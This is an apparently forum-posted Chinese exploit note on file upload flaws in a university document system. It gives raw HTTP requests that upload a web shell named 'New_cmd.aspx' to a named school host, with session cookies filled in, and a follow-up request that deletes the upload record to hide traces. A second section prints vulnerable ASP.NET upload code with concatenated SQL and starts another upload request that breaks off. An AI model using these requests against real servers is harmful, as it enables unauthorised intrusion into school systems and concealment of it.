第一处:
文件位置:/yamiiflow/Bulletin/default_doc.asp
在Header中添加来源:
Referer: xxxxxxx
否则将无法打开。
随后打开:https://edoc2.ctbc.edu.tw/Bulletin/edit_doc.asp 点击上传
上传数据包:
POST /Bulletin/edit_doc.asp HTTP/1.1
Host:
Connection: close
Content-Length: 7640
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJ0kCac27OFBajrbH
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https:// Bulletin/edit_doc.asp
Accept-Language: zh-CN,zh;q=0.9
Cookie: UserName=; UserNo=; username=%E9%99%B3%E8%92%A8%E6%85%A7; UserDName=%E7%A7%98%E6%9B%B8%E5%AE%A4; LoginUID=104013; userno=0004; UserDID=0003; ASPSESSIONIDQGBRASRS=CLFOGDMCDEHKLDLNHBNCLDCN; UserTName=test; 0004%5FMonth=4
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="isSave"
Y
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="hidIsUse"
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="hidBulletinID"
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="Subject"
123456
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="docfile"; filename="New_cmd.aspx"
Content-Type: application/octet-stream
11
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="Use"
0
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="hidPostTime"
111/2/17 16:50:6
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="StartDate"
111/2/17
------WebKitFormBoundaryJ0kCac27OFBajrbH
Content-Disposition: form-data; name="EndDate"
111/2/17
------WebKitFormBoundaryJ0kCac27OFBajrbH--上传后文件保存在:/yamiiflow/download/xxxx.asp (文件名不变)
记得删除上传的数据
POST /Bulletin/IsDelete_doc.asp HTTP/1.1
Host:
Connection: close
Content-Length: 143
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySTmAFzHdN3XEAxe0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
------WebKitFormBoundarySTmAFzHdN3XEAxe0
Content-Disposition: form-data; name="BulletinID"
17
------WebKitFormBoundarySTmAFzHdN3XEAxe0--第二处
访问路径:/DFmanage/AddImg/ExcelToFolder.aspx
核心源码:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
public partial class DFmanage_AddImg_test : System.Web.UI.Page
{
public class DataItem
{
public string DesWord { set; get; }
public string filename { set; get; }
public string Ofilename { set; get; }
}
protected void Page_Load(object sender, EventArgs e)
{
string FileNoData = "";
string Fileupload = "";
if (!IsPostBack)
{
if (Session["list_dataItems"] != null)
{
List<DataItem> list_dataItems = (List<DataItem>)Session["list_dataItems"];
// Response.Write(list_dataItems[3].filename+","+list_dataItems[3].Ofilename);
System.Web.HttpFileCollection _file = System.Web.HttpContext.Current.Request.Files;
if (_file.Count > 0)
{
string IP = "127.0.0.1";
string sqlstr = "";
for (int i = 0; i < _file.Count; i++)
{
//文件大小
long size = _file[i].ContentLength;
//文件类型
string type = _file[i].ContentType;
//文件名
string name = _file[i].FileName;
//文件格式
string _tp = System.IO.Path.GetExtension(name);
string[] filename = name.Split('/');
for (int d = 0; d < list_dataItems.Count; d++)
{
if (filename[1] == (list_dataItems[d].Ofilename + _tp))
{
//获取文件流
System.IO.Stream stream = _file[i].InputStream;
//保存文件
string saveName = list_dataItems[d].filename + _tp;
string path = Application["DFFilePath"] + saveName;
_file[i].SaveAs(path);
sqlstr = @"insert INTO DF.TempIndex.dbo.ImageData(DesNo,Type,attNo,JoinUNo,attFileName,attFilePath,SaveDate,SaveUName) " +
"values('" + list_dataItems[d].DesWord + "','1','" + list_dataItems[d].filename + "','" + Session["UserNo"] + "','" + list_dataItems[d].Ofilename + "','" + IP + "','" + DateTime.Now.ToShortDateString() + "','" + Session["ASPXusername"] + "')";
//Label1.Text += "<br />上傳成功,檔名---- " + fileName;
SqlDataSource1.InsertCommand = sqlstr;
SqlDataSource1.Insert();
// Response.Write(size + "," + type + "," + filename[1] + "," + filename[0] + "<br/>");
}
}
}
}
}
}
}
protected void Button1_Click(object sender, EventArgs e)
{
List<DataItem> list_dataItems = new List<DataItem>();
Label1.Text = "";
string savePath = (string)Application["DFTempPath"];
if (FileUpload1.HasFile)
{
string filename = FileUpload1.FileName;
Label1.Text = filename;
savePath += filename;
FileUpload1.SaveAs(savePath);
}
try
{
//建立HSSFWORKBOOK 活頁簿
// XSSF07版 HSSF03版
NPOI.XSSF.UserModel.XSSFWorkbook myWorkbook = new NPOI.XSSF.UserModel.XSSFWorkbook(FileUpload1.FileContent);
//建立HSSFSHEET 工作表
NPOI.SS.UserModel.ISheet mySheet = myWorkbook.GetSheetAt(0);
//建立DATATABLE
// System.Data.DataTable myDT = new System.Data.DataTable();
string[] celldata = new string[3];
//抓取HSSFSHEET第一列以後的所有資料,並存入DATATABLE中
for (int i = mySheet.FirstRowNum + 1; i <= mySheet.LastRowNum; i++)
{
NPOI.XSSF.UserModel.XSSFRow row = mySheet.GetRow(i) as NPOI.XSSF.UserModel.XSSFRow;
for (int j = row.FirstCellNum; j < row.LastCellNum; j++)
{
if (row.GetCell(j) != null)
{
celldata[j] = row.GetCell(j).ToString();
}
}
list_dataItems.Add(new DataItem() { DesWord=celldata[0],filename=celldata[1],Ofilename=celldata[2] });
}
Session["list_dataItems"] = list_dataItems;
//釋放活頁簿、工作表資源
myWorkbook = null;
mySheet = null;
// System.Data.DataView myView = new System.Data.DataView(myDT);
}
catch (Exception ex)
{
Response.Write("thie Error Message---" + ex.ToString());
}
}
}上传数据包:
POST /DFmanage/AddImg/ExcelToFolder.aspx HTTP/1.1
Host: edoc.xxxxx.edu.tw
Connection: close
Content-Length: 2430
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTDpsrvPQ3HlkiZbo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://edoc.xxxxxxx.edu.tw/
Accept-Language: zh-CN,zh;q=0.9
Cookie:
没有回复内容